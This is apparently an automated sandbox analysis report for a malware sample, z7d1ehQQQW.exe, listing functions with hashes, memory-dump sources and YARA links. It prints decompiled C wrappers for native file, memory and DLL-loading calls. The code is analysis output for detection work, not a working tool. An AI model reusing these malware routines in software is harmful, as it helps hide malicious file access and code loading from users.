                                                            Function 02A89478, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02A89951,00000800,00000000,00000000), ref: 02A89B62
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.676043334.0000000002A80000.00000040.00000001.sdmp, Offset: 02A80000, based on PE: false
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: 5cab80474a2462a5c8d8289220b2f64bf0366ed8e99f6829bd750a1871aa696a
                                                            • Instruction ID: 2b8d91498babfacaa40c517ae7f84a9debceeb05a9f07b52026fa7d03860b751
                                                            • Opcode Fuzzy Hash: 5cab80474a2462a5c8d8289220b2f64bf0366ed8e99f6829bd750a1871aa696a
                                                            • Instruction Fuzzy Hash: D61106B5D002099FDB10DF9AC488AEFFBF4EB88314F14842AD515A7700C775A945CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02A89870, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 02A898D6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.676043334.0000000002A80000.00000040.00000001.sdmp, Offset: 02A80000, based on PE: false
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 4f26887c196f2d8d73036a111ce8b1785107246a21aef787d899c4c7abd0743f
                                                            • Instruction ID: 800a8a5d56717f601cf25597fff32f1023388daa45d39f67af1b3d16721a5728
                                                            • Opcode Fuzzy Hash: 4f26887c196f2d8d73036a111ce8b1785107246a21aef787d899c4c7abd0743f
                                                            • Instruction Fuzzy Hash: BD110FB5D0020A8FDB10DF9AC444ADFFBF4EB88324F14842AD419A7700C778A545CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 010BD1FC, Relevance: .1, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.675718909.00000000010BD000.00000040.00000001.sdmp, Offset: 010BD000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0e5daf3cdcf39860f3b81447f43ef1f4ede6e4e8cf08391415a005a1db884d63
                                                            • Instruction ID: 056b9d45bf5f21c24cc710741e20e609721491b59157b9a1b87ce2607671fc68
                                                            • Opcode Fuzzy Hash: 0e5daf3cdcf39860f3b81447f43ef1f4ede6e4e8cf08391415a005a1db884d63
                                                            • Instruction Fuzzy Hash: CD210671504280DFDB06CF94D9C4BAAFBA5FB98328F2485A9E9450B246C336D816CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 010BD3D8, Relevance: .1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.675718909.00000000010BD000.00000040.00000001.sdmp, Offset: 010BD000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9199e0551d30491a816691ebb790e38be5d1ea6ec13978f4b38e0e94199f74d7
                                                            • Instruction ID: 6b175d587cf130c7327dd901513b0d15d1a5df0a41d569fbbeb834c70e8cf2b1
                                                            • Opcode Fuzzy Hash: 9199e0551d30491a816691ebb790e38be5d1ea6ec13978f4b38e0e94199f74d7
                                                            • Instruction Fuzzy Hash: 9A2128B1504204DFDB05CF94D9C0B9AFBA5FB88328F24C5A9E9454F206C73AE846CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 010CD01C, Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.675760734.00000000010CD000.00000040.00000001.sdmp, Offset: 010CD000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 99d247db0eff78db7bce11af82f57b876edf79dedf90a8f8fc6dd9b98379f3b5
                                                            • Instruction ID: 95d746a7a9c0dbcde4be3a77fb1b61e3f7ff810c0cce297b87c81669de33b7f0
                                                            • Opcode Fuzzy Hash: 99d247db0eff78db7bce11af82f57b876edf79dedf90a8f8fc6dd9b98379f3b5
                                                            • Instruction Fuzzy Hash: 3521F171504200DFDB11CF98D4C4B1ABBA5FB84A64F30C9BDE8894B246C336D846CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 010CD1D4, Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.675760734.00000000010CD000.00000040.00000001.sdmp, Offset: 010CD000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 300bc457593fa1f54dffbab71dcff0d13c21dc6d335e1e31e1d4c5e64031267c
                                                            • Instruction ID: 7c851029bb998787d7d4013a943d1eb2b2f6ca9cfdc5facbdb8866ee2b76e45e
                                                            • Opcode Fuzzy Hash: 300bc457593fa1f54dffbab71dcff0d13c21dc6d335e1e31e1d4c5e64031267c
                                                            • Instruction Fuzzy Hash: 1E21C471504200AFDB01DF94D9C4B1ABBA6FB94624F24C9BDD8894B242C736D846CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 010CD006, Relevance: .1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.675760734.00000000010CD000.00000040.00000001.sdmp, Offset: 010CD000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7c03d5afc6817a5f5519acd8f9d12210eda717a38d43bfb821568d54fb3378ce
                                                            • Instruction ID: 1ad0a5f81b9ab5bdf4a545cebfa43506223ccc76ddfdae71691e8eb0a3a5bf54
                                                            • Opcode Fuzzy Hash: 7c03d5afc6817a5f5519acd8f9d12210eda717a38d43bfb821568d54fb3378ce
                                                            • Instruction Fuzzy Hash: EA2183754083809FCB03CF58D994715BFB1EB46214F28C5EAD8858B657C33A9846CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 010BD1F7, Relevance: .1, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.675718909.00000000010BD000.00000040.00000001.sdmp, Offset: 010BD000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fb42d8d1fbab862093587cc362c88a032d58e969de5bbb0a95d3742b11d52bb9
                                                            • Instruction ID: dcbbce643d6bf6d9815b959ea50062dc32b69dfbddf5d581afbb171f7fc95057
                                                            • Opcode Fuzzy Hash: fb42d8d1fbab862093587cc362c88a032d58e969de5bbb0a95d3742b11d52bb9
                                                            • Instruction Fuzzy Hash: 81219D76404280DFDB06CF54D9C4B56FFA2FB84324F2486AADC440A656C33AD46ACBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 010BD3D3, Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.675718909.00000000010BD000.00000040.00000001.sdmp, Offset: 010BD000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 99d004d151982520d82b782d4735647871151bc0f40ac205a76a03d9cb8f3c13
                                                            • Instruction ID: a45d681b7b4272083565d74ec68eb668c3ee99b511a44dae00aa1152d9e592f3
                                                            • Opcode Fuzzy Hash: 99d004d151982520d82b782d4735647871151bc0f40ac205a76a03d9cb8f3c13
                                                            • Instruction Fuzzy Hash: C411B176404280DFDB12CF54D5C4B96FFB1FB84324F24C6AAD8490B656C33AE45ACBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 010CD1CF, Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.675760734.00000000010CD000.00000040.00000001.sdmp, Offset: 010CD000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 10598f41ecae80e3ed7eaa2e4d93e548ce5d2277042f09e11ef5a73a669a8393
                                                            • Instruction ID: 28e635307a3103011f339967c05c3037676a1d7cb383e148d78246008a04c8ef
                                                            • Opcode Fuzzy Hash: 10598f41ecae80e3ed7eaa2e4d93e548ce5d2277042f09e11ef5a73a669a8393
                                                            • Instruction Fuzzy Hash: 9811BE75504280DFCB42CF54C5C4B19BBA2FB84624F24C6AED8494B696C33AD44ACFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 010BD745, Relevance: .0, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.675718909.00000000010BD000.00000040.00000001.sdmp, Offset: 010BD000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5deb36d2cf283ad06230e9c4ba3f40c2d83b0c5aea8f2293293f632106e421c1
                                                            • Instruction ID: 6209efbac00b38c4c8db67208f605b5fa242456485ced3e4da9c4f2c6cc16d02
                                                            • Opcode Fuzzy Hash: 5deb36d2cf283ad06230e9c4ba3f40c2d83b0c5aea8f2293293f632106e421c1
                                                            • Instruction Fuzzy Hash: E8012471548280AAE7114E99CCC4BEAFBD8FB4126CF08845AEA440E246E7399800C7B1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 010BD744, Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.675718909.00000000010BD000.00000040.00000001.sdmp, Offset: 010BD000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0d31f051ca356dd5a1c303223e8ae68a6f14e280b72707b46455d070d612262b
                                                            • Instruction ID: 2a9ddf83d91ecce6e8bb2d662389a6503d0b67313f6a284b5358c976d409cd21
                                                            • Opcode Fuzzy Hash: 0d31f051ca356dd5a1c303223e8ae68a6f14e280b72707b46455d070d612262b
                                                            • Instruction Fuzzy Hash: 35F0C271404284AEE7118E59CCC4BA2FFD8EB81338F18C49AED480B686D3799844CBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 00867C03, Relevance: 3.7, Instructions: 3723COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.674695261.0000000000862000.00000002.00020000.sdmp, Offset: 00860000, based on PE: true
                                                            • Associated: 00000000.00000002.674677614.0000000000860000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.674788458.000000000090A000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4ab1b1d026c8585063947cb11f3cd00638b8becea5a481fd0a73e919d2159618
                                                            • Instruction ID: 2b4c7db2d68ee93a20eae462383d40bda36850a0c6c0a871f437918c4adb7355
                                                            • Opcode Fuzzy Hash: 4ab1b1d026c8585063947cb11f3cd00638b8becea5a481fd0a73e919d2159618
                                                            • Instruction Fuzzy Hash: F963E06140E7C69FDB035B785CB1290BFB1AE6321871E49C7C4C0CF0A7E619596EE726
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0086502D, Relevance: 3.7, Instructions: 3685COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.674695261.0000000000862000.00000002.00020000.sdmp, Offset: 00860000, based on PE: true
                                                            • Associated: 00000000.00000002.674677614.0000000000860000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.674788458.000000000090A000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8c6ce40efe230dc7eefba797889f6151539ed045ed1c427ffce63c13b71532bc
                                                            • Instruction ID: 903a6ddaa1610a73fd1f397bfb6e0f9d70b736c74e79b96162e0d250bcc06b2b
                                                            • Opcode Fuzzy Hash: 8c6ce40efe230dc7eefba797889f6151539ed045ed1c427ffce63c13b71532bc
                                                            • Instruction Fuzzy Hash: DD63BE6140F7C29FCB134B785CB5291BFB1AE67214B1E49CBC4C1CF0A3E219696AD726
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02A8E570, Relevance: .3, Instructions: 315COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.676043334.0000000002A80000.00000040.00000001.sdmp, Offset: 02A80000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 15a755c1e7b0d6d6519cd50566fd3bd9ba1a5dab4c192596c62c7ce38fc2d0a7
                                                            • Instruction ID: 7d91880cd48d77f21c7d51dc8caed542f363e08f2304c24ca2927ec8c8f12ffd
                                                            • Opcode Fuzzy Hash: 15a755c1e7b0d6d6519cd50566fd3bd9ba1a5dab4c192596c62c7ce38fc2d0a7
                                                            • Instruction Fuzzy Hash: 8512A3F1E927479AD310CF65E89C1893BA1BF45328BD04A08D2621FAD1DBB4956FCF48
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02A8C124, Relevance: .3, Instructions: 265COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.676043334.0000000002A80000.00000040.00000001.sdmp, Offset: 02A80000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c456ce2c6b7c84bc6c5ba702cf4cee9c93225192f1bde5eb09aeae865e1d5ddf
                                                            • Instruction ID: 9a49eab2ac2f0a52a43d05934e968fc2a9ce9d985b37942fccda6500646d7d4b
                                                            • Opcode Fuzzy Hash: c456ce2c6b7c84bc6c5ba702cf4cee9c93225192f1bde5eb09aeae865e1d5ddf
                                                            • Instruction Fuzzy Hash: 27A17F32E0060A8FCF09EFB5C98459DBBB3FF85304B15856AE905AB260DF71A915CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02A8E562, Relevance: .2, Instructions: 221COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.676043334.0000000002A80000.00000040.00000001.sdmp, Offset: 02A80000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a595e165a8dcf3610666d4261d4da7638703d8b24313444f9f20d3cb69af7509
                                                            • Instruction ID: 9ef97e67b1f3c579a933987fd6c3ec56d920ab57c3d91d7bad8a4488cd304352
                                                            • Opcode Fuzzy Hash: a595e165a8dcf3610666d4261d4da7638703d8b24313444f9f20d3cb69af7509
                                                            • Instruction Fuzzy Hash: 92C12AF1E917478AD710CF65E8881897BB1BF45328F914A08D2622FAD1DBB4946FCF48
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Analysis Process: z7d1ehQQQW.exe PID: 5800 Parent PID: 984 z7d1ehQQQW.exeCOMMON

                                                            Executed Functions

                                                            Function 00419E00, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 37%
                                                            			E00419E00(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A950(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d32
				_t12 =  &_a8; // 0x414d32
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                            0x00419e03
                                                            0x00419e0f
                                                            0x00419e17
                                                            0x00419e22
                                                            0x00419e3d
                                                            0x00419e45
                                                            0x00419e49

                                                            APIs
                                                            • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID: 2MA$2MA
                                                            • API String ID: 2738559852-947276439
                                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                            • Instruction ID: e2eeafcdabc96c90d19f56ab9cfe9238ee24689222a5818d11d4b5cf4f7c0d6d
                                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                            • Instruction Fuzzy Hash: 90F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158649BE1D97241D630E851CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00419D4A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42filenativeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00419D4A(void* __edx, signed int __edi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t22;

				ss = __edx;
				_t35 = __edi ^  *0x00000107;
				_t16 = _a4;
				_t4 = _t16 + 0xc40; // 0xc40
				E0041A950(_t35, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t12 =  &_a20; // 0x414b77
				_t22 = NtCreateFile(_a8, _a12, _a16,  *_t12, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t22;
			}




                                                            0x00419d4c
                                                            0x00419d4e
                                                            0x00419d53
                                                            0x00419d5f
                                                            0x00419d67
                                                            0x00419d89
                                                            0x00419d9d
                                                            0x00419da1

                                                            APIs
                                                            • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID: wKA
                                                            • API String ID: 823142352-3165208591
                                                            • Opcode ID: 7ab8469d83ad9bd10d0e6db8322583e6e74e3138565224800667b1ee1b7d3bde
                                                            • Instruction ID: 9ed6e26d88a505840e18b06861ebfba83fffb53acf388e89c63ac865cd2a6e33
                                                            • Opcode Fuzzy Hash: 7ab8469d83ad9bd10d0e6db8322583e6e74e3138565224800667b1ee1b7d3bde
                                                            • Instruction Fuzzy Hash: 7501F2B2201108AFCB08CF89CC91EEB37A9BF8C354F118248FA1C97241C630E851CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00419D50, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00419D50(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A950(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t11 =  &_a20; // 0x414b77
				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                            0x00419d5f
                                                            0x00419d67
                                                            0x00419d89
                                                            0x00419d9d
                                                            0x00419da1

                                                            APIs
                                                            • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID: wKA
                                                            • API String ID: 823142352-3165208591
                                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                            • Instruction ID: 0d977cd1f4fbd36c9bd444ef8f6a04c43f7f15de33bda2cf86b45a3658e1eede
                                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                            • Instruction Fuzzy Hash: BFF0BDB2211208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040ACC0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0040ACC0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C640( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA60(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCE0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AE90(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                            0x0040acdc
                                                            0x0040acdf
                                                            0x0040ace4
                                                            0x0040ace9
                                                            0x0040acf3
                                                            0x0040acf8
                                                            0x0040acfb
                                                            0x0040acfd
                                                            0x0040ad05
                                                            0x0040ad0a
                                                            0x0040ad0a
                                                            0x0040ad11
                                                            0x0040ad19
                                                            0x0040ad1c
                                                            0x0040ad1e
                                                            0x0040ad32
                                                            0x00000000
                                                            0x0040ad34
                                                            0x0040ad3a
                                                            0x0040acee
                                                            0x0040acee
                                                            0x0040acee

                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                            • Instruction ID: 8d9c8c5cc187846e167d7fc499b748faaade23025a89af1130ee390205ce80a6
                                                            • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                            • Instruction Fuzzy Hash: C40152B5D4020DA7DB10DBE5DC42FDEB7789F14308F0041AAE908A7281F634EB54C795
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00419F2A, Relevance: 1.5, APIs: 1, Instructions: 33memorynativeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 68%
                                                            			E00419F2A(void* __eax, void* __ecx, signed int __esi, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t19;
				void* _t27;
				signed int _t29;

				asm("scasd");
				_t29 = __esi ^  *(__ecx + 0x55);
				_t15 = _a4;
				_push(_t29);
				_t6 = _t15 + 0xc60; // 0xca0
				E0041A950(_t27, _a4, _t6,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t19 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t19;
			}






                                                            0x00419f2d
                                                            0x00419f2e
                                                            0x00419f33
                                                            0x00419f39
                                                            0x00419f3f
                                                            0x00419f47
                                                            0x00419f69
                                                            0x00419f6d

                                                            APIs
                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateMemoryVirtual
                                                            • String ID:
                                                            • API String ID: 2167126740-0
                                                            • Opcode ID: 53d5a4eeab02fea0f899319b816af1ebeb7531070fdd4f966839788e8bcbef93
                                                            • Instruction ID: f7523287f29d6fe6f2cf7956ba2f0c2abdca80545f7a8a6e2d1ce2ccf1de4634
                                                            • Opcode Fuzzy Hash: 53d5a4eeab02fea0f899319b816af1ebeb7531070fdd4f966839788e8bcbef93
                                                            • Instruction Fuzzy Hash: 6BF058B2210208AFDB14DF98CC81EEB77A8EF88358F118549FE1CA7241C234E811CBE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00419F30, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00419F30(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A950(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                            0x00419f3f
                                                            0x00419f47
                                                            0x00419f69
                                                            0x00419f6d

                                                            APIs
                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateMemoryVirtual
                                                            • String ID:
                                                            • API String ID: 2167126740-0
                                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                            • Instruction ID: c2721ea4e084a79d388e091216dcc94a475298a8aa449db6134383b78daf1f40
                                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                            • Instruction Fuzzy Hash: 7DF015B2210208AFCB14DF89CC81EEB77ADAF88754F118549BE1897241C630F810CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00419E7C, Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 84%
                                                            			E00419E7C(void* __eflags, intOrPtr _a4, void* _a8) {
				void* _t7;
				long _t11;
				void* _t14;
				intOrPtr _t21;

				L0:
				while(1) {
					L0:
					asm("pushad");
					asm("popad");
					if(__eflags < 0) {
						break;
					}
					L1:
					 *((intOrPtr*)(_t7 + 0x55fa7161)) = _t21;
				}
				L2:
				_t8 = _a4;
				_t4 = _t8 + 0x10; // 0x300
				_t5 = _t8 + 0xc50; // 0x40a913
				E0041A950(_t14, _a4, _t5,  *_t4, 0, 0x2c);
				_t11 = NtClose(_a8); // executed
				return _t11;
			}







                                                            0x00419e7c
                                                            0x00419e7c
                                                            0x00419e7c
                                                            0x00419e7c
                                                            0x00419e7d
                                                            0x00419e7e
                                                            0x00000000
                                                            0x00000000
                                                            0x00419e7a
                                                            0x00419e7a
                                                            0x00419e7a
                                                            0x00419e80
                                                            0x00419e83
                                                            0x00419e86
                                                            0x00419e8f
                                                            0x00419e97
                                                            0x00419ea5
                                                            0x00419ea9

                                                            APIs
                                                            • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 076a299f7c407e1331a305a4888a038f6a5f5e7c31a648711791beeed5cdc0c0
                                                            • Instruction ID: 139aa4a7a0a911ada602052342df41cd9bde445464c7247a71f2d17c10fc803e
                                                            • Opcode Fuzzy Hash: 076a299f7c407e1331a305a4888a038f6a5f5e7c31a648711791beeed5cdc0c0
                                                            • Instruction Fuzzy Hash: C3E0DF712403007BCA14DBD5CC45E977B6CEF05330F11405AFA095B242C530A54086E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00419E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
